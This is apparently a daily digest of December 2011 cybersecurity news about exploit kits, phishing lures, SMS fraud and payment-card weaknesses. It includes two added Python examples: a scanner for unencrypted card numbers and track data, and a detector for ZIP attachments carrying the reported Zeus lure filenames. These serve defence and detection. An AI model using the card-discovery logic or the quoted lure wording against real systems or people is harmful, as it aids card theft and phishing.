Holiday season is fertile ground for most malware infections. Data released by SpywareRemove.com shows the holiday season, beginning with the Thanksgiving holiday in the United States through Christmas, is the most active time for malware infections. Research data compiled by the site over the last year (late 2010 — present) showed December 27, 2010 to have the largest spike in malware infections it tracked, with a 56 percent increase over the previous day. The company believes the December 27 date was prolific among cybercriminals due to the after Christmas rush of gift exchange and post-holiday deals by retailers. The Web site compiled its list of the top five malware infection dates according to its tracking data: December 27, 2010; February 27, 2011 (malware and phishing attacks attributed to the New Zealand earthquake); March 28, 2011 (breaking news of the Arab Spring protests); April 4, 2011 (the Monday after April Fool’s day); and November 28, 2011 (Cyber Monday). The top five malware infection dates indicate malware writers use a two-pronged strategy to deliver their malicious payloads to computers by taking advantage of one-time major events, as well as fixed dates on the calendar during the holiday season.
12/23/2011
Facebook scams now spread by dodgy browser plug-ins. Scammers have developed a new approach to spreading scams on Facebook. Instead of using status updates as a lure, the latest generation of Facebook scams attempts to trick marks into installing malicious browser extensions. The plug-ins are supposedly needed to view non-existent video clips supposedly posted by an earlier victim. Once installed, these malign browser add-ons spread the scam from one user’s profile to another.
Security experts advise users to ditch Java. After installing operating systems on their computers, most individuals rush to install applications that help them browse the Web. While many believe that without components such as Flash and Java they will be unable to access certain content, there are always safer, more secure alternatives. F-Secure researchers noted that many people have Java installed but do not actually need it; its presence only gives cybercriminals an opportunity to exploit the device it is installed on. The main issue is that many Internet users confuse Java with JavaScript, a crucial component of the Web. “If you’re running Java, but not the latest version, you’re vulnerable. So either you have to check at all times that you have the latest version of Java — or get rid of it altogether,” said an F-Secure researcher. After studying the Blackhole exploit kit’s control panel, the experts discovered more than 16,000 computers had been taken over using the Java Rhino vulnerability.
12/21/2011
Mobiles forced to send premium-rate texts in new attack. Cyber criminals may be able to force mobile phones to send premium-rate SMS messages or prevent them from receiving messages due to security weaknesses in mobile telecoms standards. The weakness involves the handling of messages directed towards SIM Application Toolkits — applications preloaded onto SIM cards by mobile operators. The applications can be used for functions such as displaying available credit or checking voice mail, as well as handling value-added services, such as micro-payments. SIM Toolkits receive commands via specially formatted and digitally signed SMS messages. These messages are processed without appearing in a user’s inbox and without triggering any other alert. The encryption scheme is robust, but problems might arise because error messages are automatically sent out if a command cannot be executed. The SIM Toolkit service message can be configured so responses are made via SMS to a sender’s number or to the operator’s message center, creating two possible attack scenarios.
Malware authors rush to release Java exploit packs. Researchers at M86 are warning that exploits for a recently discovered Java vulnerability are available in the wild, meaning cyber criminals could target unpatched systems. The security firm also warned this news shows authors are getting much faster at updating exploit kits when new vulnerabilities are discovered. While it used to take authors a month or more, some authors are now updating their kits even before a patch is released. Although a patch was released to fix the Java vulnerability, any unpatched systems are still at risk, M86 warns. The Blackhole, Phoenix, and Metasploit exploit kits are the ones that rush-released new versions to exploit the vulnerability, called CVE-2011-3544, which affects the Rhino JavaScript engine. An attacker can use a script to generate an error object, which can then give them full privileges. The attacker can then execute code with full permissions, M86 said.
Flash Player scam charges victims for free program via SMS. A scheme that charges people via SMS for what should be a free copy of Adobe Systems’ Flash player is apparently undergoing a test run on a Russian social network, according to security vendor Bitdefender. The scam was uncovered after a Bitdefender customer found a suspicious link to a Flash Player update on Vkontakte, a social networking service for Russian speakers, according to a senior e-threat researcher for Bitdefender. If clicked, the link leads to the Flash Player application, but a drop-down menu then asks what country the user is located in as well as their mobile phone number and operator. Adobe does not ask for any of that information during a normal installation. If the person is located outside of Russia, the installer instructs the person to send a message to a short code to receive an “activation” code for the program, the researcher said. Russian users are not charged, perhaps because the scam would be reported quickly to authorities, he said. The scammers have apparently signed up for SMS payment processing services for countries such as the United Kingdom. According to the drop-down menus, the scammers arranged for SMS payments on networks including O2, Vodafone, and Orange, as well as AT&T in the United States. The scam is not widespread yet, which the researcher said may mean the scammers are conducting a trial run to see how well it works before hitting other social networking sites such as Facebook.
12/19/2011
Old smartphones leave tons of data for digital dumpster divers. A recent exploration made by a digital forensics company into a handful of phones found in the smartphone secondary market showed how easy it is to glean information from old or lost phones, even if a factory reset has been performed. An expert from AccessData gave Dark Reading information on his findings from his informal research and explained some of the repercussions for corporations and consumers who do not pick, manage, or dispose of their phones wisely. The director of mobile forensics for AccessData said, "I'd guess if you went and grabbed 10 phones [from recycling companies], 60 percent are going to contain data." He said at the behest of a customer interested in the data lingering on phones sold by used phone resellers and consumers using Craigslist and eBay, he used AccessData's tools to do an in-depth forensics dive into five handsets acquired from this market. The phones were the iPhone 3G, Sanyo 2300, HTC Wildfire, LG Optimus, and HTC Hero. Of those five, the iPhone and the old Sanyo had not been reset and contained what the director called logical data: active account sign-ons, contacts, and calendar information easily usable by any person who turns on the phone. Even though all of the Android phones had been wiped through a factory reset, four of the five phones also included data that would take someone with forensics tools and knowledge to extract from more hidden storage locations. Some of the details available within those phones included user account information, Social Security numbers, geo-location tags, deleted text messages, and a resume.
12/16/2011
Hackers feast on unencrypted credit card data stored by merchants. A report released by Security Metrics December 15 states the number of merchants that store customer credit card data in an unencrypted form is higher than ever. The latest Merchant Data Security Report reveals that 71 percent of the businesses that participated in the study stored unencrypted credit card data, and many were highly vulnerable to SQL injection attacks. With the use of a tool called PANscan, Security Metrics scanned the systems of 2,736 merchants, including hard drives, networks, and attached storage devices in search of unencrypted primary account numbers (PAN) and magnetic stripe track data. The scan found a total of 378,748,700 cards, which translates into an 8 percent increase when compared to 2010. Old, non-PCI compliant, payment applications are problematic and easy to hack, but new payment systems can turn out to be just as insecure if they are not configured correctly. Other problems emerge from the improper removal of payment-information-containing files. Many believe if they delete a file, it is as good as gone, but this is not the case. Even if the information is not available for the user, hackers can easily recover it from the device’s unassigned storage space. While a large part of the sensitive data is stored unknowingly by employees who are just not trained to handle sensitive data, in many situations merchants do not bother to make sure the data is safely tucked away from malicious cybercriminal operations.
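The PANscan sweep described above looks for primary account numbers and magnetic stripe track data sitting in cleartext. The following is an added example of that kind of discovery logic, not SecurityMetrics' tool: it Luhn-checks digit runs, recognises track 1 and track 2 layouts, and reports PANs in masked form; the SAMPLE text is constructed from published test card numbers, not real cardholder data.

```python
"""Scan text for unencrypted primary account numbers (PANs) and magnetic stripe
track data, the same kind of sweep the PANscan report describes.
Added example: this is not SecurityMetrics' tool, and SAMPLE below is constructed
from published test card numbers, not real cardholder data."""
import re
import sys
from typing import Dict, List

# A run of 13-19 digits, optionally separated by single spaces or dashes, that is
# not embedded in a longer digit run. Every candidate is then Luhn-checked.
_PAN_RE = re.compile(r"(?<![0-9])(?:\d[ -]?){12,18}\d(?![0-9])")
# Track 1, format B: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
_TRACK1_RE = re.compile(r"%B(\d{13,19})\^([^^?]{2,26})\^(\d{4})\d*\??")
# Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
_TRACK2_RE = re.compile(r";?(\d{13,19})=(\d{4})\d*\??")


def luhn_valid(digits: str) -> bool:
    """True when the digit string passes the Luhn mod-10 check used for card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                 # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """PCI-style display form: first six and last four digits only."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_text(text: str) -> List[Dict[str, object]]:
    """Return findings ({kind, pan, expiry?, offset}) for track data and bare PANs."""
    findings: List[Dict[str, object]] = []
    covered = []  # spans already reported as track data, so their PAN is not double-counted

    for kind, rx in (("track1", _TRACK1_RE), ("track2", _TRACK2_RE)):
        for m in rx.finditer(text):
            pan = m.group(1)
            if luhn_valid(pan):
                covered.append(m.span())
                expiry = m.group(3) if kind == "track1" else m.group(2)
                findings.append({"kind": kind, "pan": mask_pan(pan),
                                 "expiry": expiry, "offset": m.start()})

    for m in _PAN_RE.finditer(text):
        if any(start <= m.start() < end for start, end in covered):
            continue
        pan = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(pan) <= 19 and luhn_valid(pan):
            findings.append({"kind": "pan", "pan": mask_pan(pan), "offset": m.start()})

    findings.sort(key=lambda f: f["offset"])
    return findings


# Constructed sample: an order number that fails Luhn (a decoy), a spaced-out
# Mastercard test number, a track 1 record and a track 2 record.
SAMPLE = """\
order_id=1234567890123456 customer=Doe, Jane
card: 5500 0000 0000 0004 exp 12/25
%B4111111111111111^DOE/JANE^25121011234567890?
;378282246310005=2512101123456789?
"""

if __name__ == "__main__":
    # Usage: python panscan_example.py [file ...]  (no arguments scans SAMPLE)
    sources = [(p, open(p, encoding="utf-8", errors="ignore").read()) for p in sys.argv[1:]] \
        or [("SAMPLE", SAMPLE)]
    for name, text in sources:
        for f in scan_text(text):
            line = text.count("\n", 0, f["offset"]) + 1
            print(f"{name}:{line}: {f['kind']} {f['pan']}")
```

Run against SAMPLE it reports the spaced Mastercard number, the track 1 record and the track 2 record, and ignores the decoy order number because it fails the Luhn check.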
Silent updating for Internet Explorer. Microsoft announced that in 2012 Internet Explorer will be updated “silently” to its newest possible version. This new silent update will eliminate the pop-up window that currently allows users to opt out of or postpone the update. Silent updating is generally seen as a big improvement to security on the Internet. Being on the newest possible Internet Explorer brings a significant increase in security and resistance to malware infections due to better architecture, sandboxing, and the included URL filtering feature.
GlobalSign certificate authority details ComodoHacker security incident. After temporarily shutting down their certificate issuance services in September, GlobalSign released a report with conclusions on the events that took place after they learned ComodoHacker breached their systems. The company stated no rogue certificates were issued and no customer data was exposed. The evidence indicates no root certificate keys and associated Hardware Security Modules (HSM), Issuing Authorities and associated HSMs, or Registration Authority services were compromised. The certificate authority’s infrastructure was left undamaged by the cybercriminal operation. The company reports only a peripheral Web server on which the public Web site was hosted was compromised, but the server was not part of the certificate issuance infrastructure. GlobalSign claimed only HTML pages, publicly available PDF documents, and the key and certificates assigned to globalsign.com were exposed to the hacker, but both the key and the certificate were revoked. Customers were impacted only between September 6 and 15 when the issuance was temporarily halted. During that period, third party security solutions providers such as Fox-IT and Cyber Security Japan were contacted for the purpose of analyzing and reinforcing the breached infrastructure. GlobalSign continues to collaborate with authorities while they gather more evidence on ComodoHacker, and the other actors involved.
Newfangled graphics engine for browsers fosters data theft. Software developers at Google, Apple, Adobe, and elsewhere are grappling with the security risks posed by an emerging graphics technology, which in its current form could expose millions of Web users’ sensitive data to attackers. The technology, known as CSS shaders, is designed to render a variety of distortion effects, such as wobbles, curling, and folding. It works by providing programming interfaces Web developers can call to invoke powerful functions from an end user’s graphics card. However, it could also be exploited by malicious Web site operators to steal Web-browsing history, Facebook identities, and other private information from unsuspecting users, a security researcher on Google’s Chrome browser warned recently.
Use of the Black Hole exploit kit and Java exploits is growing. Security experts are increasingly concerned about the growth of Java as the application of choice for criminals. Java either is or will imminently become the favorite application attack vector, surpassing even PDF and SWF files. A security expert with Kaspersky Lab wrote that a Java exploit first published in October and used in drive-by attacks has found its way into the Black Hole exploit kit, aimed primarily at users in Russia, the United States, the United Kingdom, and Germany. “Java is probably the vector most commonly exploited by cybercriminals,” said a SophosLabs security expert, “and we don’t see any sign of this situation changing anytime soon. The Black Hole exploit pack is the most commonly used malicious software installer that SophosLabs have been seeing in the last three months.” According to Oracle, there are more than 13 million devices running Java. Criminals are turning to Java because they are businessmen — they tend to perform cost-benefit analyses. The problem with Java, said an ESET senior research fellow, comes “from the fragmentation of its implementations across platforms and devices.” He noted he is unsure “how far it’s possible to fix it across the board.”
Google pulls more SMS fraud-related Android apps. Google removed five additional apps from the Android Market that mobile-security firm Lookout alleges appear to be engaged in SMS fraud targeting Europeans. The apps were removed after Lookout discovered them December 13, a Lookout representative told CNET. That brings the total number of apps removed that Lookout has dubbed “RuFraud” (Russian Fraud) to 27, the representative said. The apps, which appear to be free versions of legitimate games or wallpaper, are designed to charge premium SMS toll rates on European phones, Lookout said. The rates are buried within the terms of service, and users may not realize they will be charged $5 per SMS, according to the firm. Google confirmed December 12 it removed 22 Lookout-identified fraudulent apps before the firm found the 5 additional ones.
12/14/2011
Windows Phone bug reportedly disables messaging. A reported vulnerability in Windows Phone causes its messaging features to be disabled after the device is sent a specific SMS or chat message. The bug was reported to the blog Winrumors, according to the researcher who administers the Web site. He wrote he and the reporters were notifying Microsoft. In a video, the Winrumors administrator shows that after a Windows Phone device receives the message, it shuts down. Upon reboot, the messaging hub tile does not work despite repeated attempts. The denial-of-service issue also occurs if a person is sent a specific Facebook or Windows Live Messenger chat message. Winrumors ran tests on the HTC Titan, the Samsung Focus Flash, and others running the 7740 version of Windows Phone 7.5 and the Mango RTM build 7720, the administrator wrote. "At this stage, there doesn't appear to be a workaround to fix the messaging hub apart from hard resetting and wiping the device," he wrote. The bug appears to have other strange effects. He found a live tile featuring updates from a Facebook friend will lock up if that friend posts a particular message. He wrote that problem could be avoided by initially booting up a device, getting past the lock screen quickly, and then removing the live tile before it flips over and locks the device.
Google Wallet stores too much unencrypted data, researchers say. A recent forensic analysis performed by researchers from ViaForensics showed that while Google’s Wallet application can be highly useful for smartphone owners, doing a good job of protecting their assets, there are some issues that may be security risks. During the experiment, performed on a rooted device, three methods of breaking the Wallet’s security were attempted: man-in-the-middle (MitM) attacks, forensic analysis of the data stored on the device, and examination of system logs. The first conclusion was that MitM attacks are no match for the application, since the experts’ attempts during account setup and while adding a credit card failed. In the second phase, the forensic analysis, the app’s cache directory revealed pictures of some credit cards, the most significant information visible being the card’s expiration date. However, before the research was finished, Google issued an update that resolved this issue. The SQL databases revealed the most information on the device’s owner, including credit card balance, limits, expiration date, cardholder name, transaction dates, and locations. All the data was left unencrypted. Another security bug patched by Google was that the delete transaction or reset function did not actually delete the data; the researchers proved it could be easily recovered.
Google pulls 22 more malicious Android apps from Market. Google removed nearly two dozen malware-infected apps from its official Android Market in the last several days, a security company said December 11. So far in 2011, Google pulled more than 100 malicious Android apps from its download distribution channel. Lookout Security said it and other vendors notified Google of several recent waves of malicious apps — 22 apps altogether — that reached the Android Market. Google removed those programs from the e-mart, said Lookout. Lookout spotted nine malware-infected apps the week of December 5, and another 13 the weekend of December 10 and 11. The company dubbed the malware bundled with the fake apps "RuFraud", and said the code sent spurious text messages to premium numbers, racking up revenues for the criminals. While North American users were not affected — RuFraud was written not to target the United States, for instance — people in France, Germany, Italy, Poland, Russia, the United Kingdom, and several other eastern European and central Asian countries were. As in previous malicious app campaigns, the RuFraud apps borrowed elements of legitimate apps, but did not simply snatch complete apps, then re-package them with malicious code, said Lookout. The recent RuFraud operations began with horoscope apps, then moved on to Android phone wallpapers and downloaders posing as accessories to bestselling games such as "Angry Birds", and "Cut the Rope", then finished with a round of fake games, Lookout's researchers said. That last run accounted for the majority of downloads before Google pulled the apps. Lookout estimated about 14,000 copies of the fake games were grabbed by users.
Spam campaign bypasses Gmail filters, employs Google Docs. Every so often, online crooks and spammers use Google Docs to host phishing forms or documents with embedded malicious links. One such spam campaign is currently delivering a simplistic e-mail with a link to a Google Docs document to inboxes around the world. A Stanford researcher identified the campaign and found the e-mail effectively bypassed Google's spam filters — a rare occurrence. The link leads to an untitled document touting fake/novelty university diplomas and degrees. Google Docs displays the number of people who viewed the document, so the researcher could see how many people were viewing it — which means they followed the link. "I saw 7 other people taking a look at the document while writing this post so it is clear that this campaign is active and successful," he commented.
DNS hijacks now being used to serve Black Hole Exploit Kit. Attackers have been going after various pieces of the DNS infrastructure for a while, and it is not unusual for there to be organized campaigns that target certain industries or geographic regions. Lately, however, researchers are seeing a pattern where attackers add new names to existing domains and use those sub-domains to piggyback on the good reputation of sites and push counterfeit goods, pills, etc. Now, attackers are using the attack to push exploits via the Black Hole Exploit Kit. The attacks have been ongoing for a few months, and, while they are simple in theory, researchers are unable to figure out how the attackers managed to compromise the domains and get access to the DNS records to add their own sub-domains. Attackers have been able to alter domain records of dozens of existing, legitimate sites, including local government agencies, small businesses, community banks, and others and then inserted new sub-domain names into the records. Researchers at the SANS Internet Storm Center have been looking into the attacks and identified dozens of domains affected and poisoned with the insertion of myriad sketchy sub-domains pushing fake pharmaceuticals, loans, and other Internet spam staples.
12/13/2011
Phishing targets FDIC. The Federal Deposit Insurance Corporation (FDIC) is warning banks about another strand of phishing attacks feigning to come from the FDIC, Bank Info Security reported December 9. In an e-mail alert, the FDIC warned that the e-mails appear to be coming from “insurance@fdic.gov,” “subscriptions@fdic.gov,” “alert@fdic.gov,” and “accounts@fdic.gov.” The fraudulent e-mails include the subject lines “FDIC: Your business account”, “FDIC: About your business account”, “Insurance coverage of your business account”, or other similar variations. The e-mails also include a malicious link that claims to offer critical information about financial institutions. The claim states: “We have important news regarding your bank. This includes information on the acquiring bank (if applicable), how your accounts and loans are affected, and how vendors can file claims against the receivership.” The FDIC said recipients of the e-mails should be mindful of any electronic correspondence that appears to come from the FDIC, and reiterated that it does not issue unsolicited e-mails to consumers or business accountholders.
Web scam-busting trio thwarted by mystery DDoS rocket. Several anti-scam sites were knocked offline the week of December 5 by fierce and well-organized distributed denial of service (DDoS) attacks. The sites — 419eater.com, scamwarners.com, and aa419.org (Artists against 419) — were swamped with junk traffic for several days. During the attack, the sites’ administrators turned to blogs, Facebook, and other alternative channels to distribute news of newly detected fake payment sites and other urgent anti-fraud information. “These websites and their users provide excellent exposure for online fraud activities and have been responsible for allowing thousands of prospective victims to detect a scam in play, and get out before losses are incurred,” a reader who informed The Register about the attacks explained. “They also work actively to kill fake bank sites, fake freight forwarding sites and other criminal resources.” Both 419eater.com and scamwarners.com were back operating normally by December 12, while aa419.org remained sluggish.
12/12/2011
Microsoft plans 20 patches next week that will fix Duqu and BEAST bugs. Microsoft announced December 8 it will issue 14 security bulletins the week of December 12 to patch 20 vulnerabilities in Windows, Internet Explorer (IE), Office, and Windows Media Player. Among the patches will be ones that plug the hole used by the Duqu intelligence-gathering Trojan, and fix the SSL 3.0 and TLS 1.0 bug popularized 3 months ago by the BEAST (Browser Exploit Against SSL/TLS) hacking tool. Three of the 14 updates were tagged with Microsoft’s “critical” label, while the remaining 11 were marked “important.” Bugs in 10 of the updates could be exploited by attackers to remotely plant attack code on unpatched PCs, Microsoft said in its monthly advance notification that precedes each Patch Tuesday. A number of those bulletins were pegged as important, a move Microsoft makes when the bugs cannot easily be exploited because the pertinent components are not switched on by default, or because defensive technologies like ASLR and DEP help protect users.
12/09/2011
Beware Adobe software upgrade notification – malware attached! Cybercriminals have widely spammed out a malware attack posing as upgrades for Adobe Acrobat Reader and Adobe X Suite Advanced. The e-mails, which pretend to come from Adobe, have a ZIP file attached that contains a version of the Zeus Trojan, designed to steal banking information from compromised computers. The risk is that less technically savvy computer users might believe the e-mail is legitimate, and be tricked into installing malware onto their computer thinking it is an official Adobe update. Each e-mail is slightly different, incorporating different reference numbers in the subject line, attached filename, and message body. The samples seen so far by Sophos all carry malware in the file "Adobe Systems Software Critical Update Dec 2011.exe" contained within the ZIP.
12/08/2011
Fake Verizon notification carries malware. A spam e-mail campaign aiming to infect users with a banking trojan is currently underway and is targeting mobile carrier customers, Microsoft has warned, Help Net Security reported December 7. The e-mail purports to be coming from Verizon, and tries to make the recipient feel a sense of urgency by claiming it contains important account information from Verizon Wireless. The message starts with the unusual greeting of "Hello Dear!," and proceeds to try and convince the users they have to pay a rather large bill (the amount varies from $250 to over $1,500). "View all your recent bills in application materials," says the e-mail, and offers an attached ZIP file named Verizon-Wireless-Account-StatusNotification_#######.zip, with random numbers used in the name. The archive contains a similarly named executable, which is detected as a variant of the Zeus banking Trojan, and Microsoft warns a similar campaign carrying the same payload has already been started using e-mails pretending to deliver a critical update for Adobe Acrobat Reader and Adobe X Suite.
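Both the Adobe and the Verizon campaigns above deliver Zeus as an executable inside a ZIP attachment. The following is an added example of a mail-gateway check for that pattern (not Sophos' or Microsoft's code): it unpacks an attachment in memory, flags entries with executable extensions or a PE header, and matches the two attachment names the reports give; the archive it builds is constructed with a two-byte header stub and contains no malware.

```python
"""Gateway-side inspection of a ZIP mail attachment for the executable payloads the
Adobe and Verizon lures carry.
Added example: this is not Sophos' or Microsoft's code, and the archive built by
build_sample_zip() is constructed in memory with a two-byte PE header stub, not malware."""
import io
import re
import zipfile
from typing import List

# Extensions Windows will execute directly when a user double-clicks the extracted file.
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}

# File names reported for the two campaigns. The digit run stands in for the random
# numbers in the Verizon attachment name; the Adobe name is the fixed one Sophos saw.
LURE_NAMES = [
    re.compile(r"^Adobe Systems Software Critical Update Dec 2011\.exe$", re.I),
    re.compile(r"^Verizon-Wireless-Account-StatusNotification_\d+\.(zip|exe)$", re.I),
]


def _ext(name: str) -> str:
    """Lower-cased final extension including the dot, or '' when there is none."""
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def inspect_zip(data: bytes) -> List[str]:
    """Return the reasons an archive should be quarantined; an empty list means none found."""
    reasons: List[str] = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid ZIP archive"]
    with archive:
        for info in archive.infolist():
            name = info.filename
            if _ext(name) in EXEC_EXTS:
                reasons.append(f"executable entry: {name}")
            with archive.open(info) as fh:
                head = fh.read(2)
            if head == b"MZ":           # PE header, whatever the file name claims
                reasons.append(f"PE (MZ) header in: {name}")
            if any(p.match(name) for p in LURE_NAMES):
                reasons.append(f"known lure filename: {name}")
    return reasons


def check_attachment(filename: str, data: bytes) -> List[str]:
    """Combine the outer attachment name check with the archive contents check."""
    reasons = ([f"known lure attachment name: {filename}"]
               if any(p.match(filename) for p in LURE_NAMES) else [])
    if _ext(filename) == ".zip":
        reasons.extend(inspect_zip(data))
    return reasons


def build_sample_zip() -> bytes:
    """Constructed stand-in for the spammed archive: the named .exe plus a benign text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Adobe Systems Software Critical Update Dec 2011.exe", b"MZ" + b"\x00" * 62)
        zf.writestr("readme.txt", b"Please run the attached update.")
    return buf.getvalue()


if __name__ == "__main__":
    for reason in check_attachment("Verizon-Wireless-Account-StatusNotification_1234567.zip",
                                   build_sample_zip()):
        print("QUARANTINE:", reason)
```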
Hackers exploit Adobe Reader zero-day, may be targeting defense contractors. Adobe confirmed December 6 an unpatched vulnerability in Adobe Reader is being exploited by criminals. Those attacks may have been aimed at defense contractors. Adobe promised to patch the bug in the Windows edition of Reader and Acrobat 9 no later than the end of the week of December 12. "A critical vulnerability has been [found] in Adobe Reader X (10.1.1) and earlier versions for Windows and Macintosh, Adobe Reader 9.4.6 and earlier 9.x versions for Unix, and Adobe Acrobat X (10.1.1) and earlier versions for Windows and Macintosh," Adobe said in an early-warning e-mail. "This vulnerability could cause a crash and potentially allow an attacker to take control of the affected system." The company issued a security advisory with what information it was willing to share. Adobe acknowledged the vulnerability is being exploited in what it called "limited, targeted attacks" against Reader 9.x on Windows, but did not provide any additional information about where and when the attacks were occurring, or who had been targeted. Adobe identified the bug as a "U3D memory corruption vulnerability." U3D (universal 3D) is a compressed file format standard for 3-D graphics data promoted by a group of companies, including Adobe, Intel, and Hewlett-Packard. Reader vulnerabilities are typically exploited by attackers using malicious PDF documents that are attached to e-mail messages with baited subject lines that try to dupe recipients into opening the document. Doing that also executes the malicious code — in this case, likely malformed U3D data — hidden in the PDF, compromising the victim's PC and letting the attacker infect the machine with other malware. The attacks exploiting the unfixed flaw may have targeted U.S. defense contractors: Adobe originally credited the security response teams at both Lockheed Martin and MITRE with reporting the vulnerability.
12/07/2011
HP publishes list of LaserJet printers susceptible to malicious firmware update. After the controversial study about HP LaserJet printers that could be set on fire was released to the public, HP quickly came forward to defend its reputation, Softpedia reported December 6. The first move they made was to publish November 30 the list of devices that could be impacted by the installation of an unauthorized printer firmware. “Potential security vulnerability has been identified with certain HP printers and HP digital senders. The vulnerability could be exploited remotely to install unauthorized printer firmware,” reads the security bulletin. HP LaserJet Enterprise 500 color M551, HP LaserJet Enterprise 600 M602, HP LaserJet M3035, HP Color LaserJet CP4005, HP LaserJet P4515, and HP LaserJet Enterprise M4555 MFP are just a few of the models out of the 40 or so listed by the company. Essentially, customers who purchased HP LaserJet models that were manufactured before 2009 may be susceptible to the attack. Meanwhile, until they come up with a more permanent solution to the issue, an advisory was published so customers can learn how to secure their devices against unauthorized access.
12/06/2011
U.S. financial fraud increasing rapidly. Cyber criminals are launching more and more sophisticated attacks on U.S. wireless consumers, Help Net Security reported December 5. Research showed financial fraud and spam via SMS texts is growing at a rate of over 300 percent year over year. Cloudmark is tracking over 20 unique, finance-related SMS attacks in the United States with thousands of variants on each attack. The attack techniques are becoming increasingly sophisticated and can include any combination of rapidly changing content, phone numbers, and MSISDN (a number uniquely identifying a mobile subscription). There are a number of recent SMS attacks. Two prominent examples include loan and gift card scams, and the more malicious credit card and bank fraud attacks. For the loan and gift card attacks, the scammers’ business model is based on referrals for loans, via either Web redirects that send traffic immediately to an affiliate program, or by accepting applications forwarded to affiliate programs. For the banking and credit card fraud attacks, the text in each fraudulent SMS appears as if it is coming from a major bank or credit card company such as Wells Fargo or Visa. The attackers are sending texts with messages such as "Your Visa card has been deactivated. Please call [number] to reactivate it." When a recipient calls the number, they are asked for their name, bank card number, account number, expiration date, security/PIN code and/or address, all the data the criminals need to gain access to the credit card or bank account. In some cases, criminals created a replica of a victim’s bank card from the data provided. Cyber criminals are increasingly moving from targeted phishing via e-mail to mobile messaging.
Cyber criminals launch bogus money transfer malware attacks. A new malware attack is luring victims by using Web-based exploits to perform a "drive-by" malware download under the guise of an electronic money transfer, V3.co.uk reported December 3. Researchers at Solera Networks reported the attackers make use of Google's goo.gl link-shortening service to hide the location of the attack site. The attacks claim to originate from the "Electronic Payments Association" and notify potential victims of a failed direct deposit attempt. Clicking on the link included with the message redirects to a site that attempts to perform a number of exploits using vulnerabilities in Flash and Java. The director of threat research at Solera told V3 the attacks are part of a much larger trend in which cyber criminals target browser plug-ins and third-party components. The attacks also highlight the use of third-party link-shortening services. Other malware and spam operations have made similar use of such tools to insulate targets from the actual attack site.
‘Verified by Visa’ presents major security flaw. Trend Micro researchers discovered the technology behind the Verified by Visa trademark is much less secure than anyone would believe, and a coding error is not to blame; instead it is a design flaw that could be taken advantage of by criminals, Softpedia reported December 2. The 3 Domain Secure (3DS) security protocol introduced by Visa in 2001 was developed to prevent credit card fraud but, in practice, it is ineffective. When users make an online transaction protected by Visa, they are redirected to a verification page that requires confirmation of some details and a password. Since the merchant does not come in contact with users' details at any point, the transaction should be secure. A problem emerges due to the password reset feature. When a customer accesses the reset password function, she is presented with a form that requires some details of the cardholder to prevent fraud, but the problem is that nearly all of that data can be read off the physical credit card. Signature panel code, expiration date, cardholder name, and birth date are requested from the customer to complete the reset process. All the details except for the birth date are printed on the card, and these are also the details first obtained by any cybercriminal in operations that target credit cards. Researchers propose this verification method should at least be updated to include a secret question, a one-time password reset URL should be sent to the user’s e-mail, and the entire procedure should result in a notification. The 3DS security protocol is not only used by Visa. Web sites that display MasterCard SecureCode, J/Secure (JCB International), and SafeKey (American Express) implement the same technology.
12/05/2011
SEC charges multiple hedge fund managers with fraud in inquiry targeting suspicious investment returns. As part of an initiative to combat hedge fund fraud by identifying abnormal investment performance, the Securities and Exchange Commission (SEC) December 1 announced enforcement actions against three separate advisory firms and six individuals for various misconduct, including improper use of fund assets, fraudulent valuations, and misrepresenting fund returns. In particular, the SEC alleges the firms and managers engaged in a wide variety of illegal practices in the management of hedge funds or private pooled investment vehicles, including fraudulent valuation of portfolio holdings, misuse of fund assets, and misrepresentations to investors about critical attributes such as performance, assets, liquidity, investment strategy, valuation procedures, and conflicts of interest. In one case, the SEC charged two individuals for engaging in a fraudulent scheme to overvalue the reported returns and net asset value of the Millennium Global Emerging Credit Fund. The complaint alleges the fund’s former portfolio manager schemed with two European-based brokers to inflate the fund’s reported monthly returns and net asset value by manipulating its supposedly independent valuation process. The scheme caused the fund to drastically overvalue security holdings by as much as $163 million in August 2008. By overstating the fund’s returns and overall net asset value, the manager was able to attract at least $410 million in new investments, deter about $230 million in eligible redemptions, and generate millions of dollars in inflated management and performance fees. The other actions were brought against ThinkStrategy Capital Management and its sole director, Solaris Management LLC and its owner, and LeadDog Capital Markets LLC and its general partners and owners.
Yahoo Messenger flaw enables spamming through other people's status messages. An unpatched Yahoo Messenger vulnerability that allows attackers to change people's status messages and possibly perform other unauthorized actions can be exploited to spam malicious links to a large number of users, IDG News Service reported December 2. The vulnerability was discovered in the wild by security researchers from antivirus vendor BitDefender while investigating a customer's report about unusual Yahoo Messenger behavior. The flaw appears to be located in the application's file transfer API (application programming interface) and allows attackers to send malformed requests that result in the execution of commands without any interaction from victims.
Trusteer warns that cybercriminals are moving into fresh one-stop crime areas. Research published November 30 by Trusteer claims to show cybercriminals have widened the services they provide as a one-stop-shop to third-party fraudsters. According to the in-browser security specialist’s chief technology officer, these one-stop shops are where criminals can buy everything they need to meet demand from fraudsters. Trusteer has come across a new fraud group that — as well as offering infection services for prices between 0.5 and 4.5 cents for each upload, depending on geography — also provides polymorphic encryption, and AV checkers. This new one-stop-shop approach for malicious services, he asserts, is a natural evolution of the market: if the customers need to infect, then they also need to evade AV. For polymorphic encryption of malware, he said, the fraudsters are charging from $25 to $50 — and for prevention of malware detection by anti-virus systems (AV checking) they charge $20 for 1 week, and $100 for 1 month of service. The chief technology officer said it is now a buyer’s market, with his firm’s research operation having also come across advertisements published by prospective buyers of infection services. The ad, he noted, basically presets the buying price, how it is charged, and the scope of the service, with the advertiser only paying for unique uploads, with the price calculations being conducted according to the advertiser's own Black Hole exploit kit stats module. In addition, Trusteer said the advertiser will pay in advance to the sellers with recommendations, that is, those that have 1-10 "fresh" forum messages, otherwise the sellers are paid afterwards.
12/01/2011
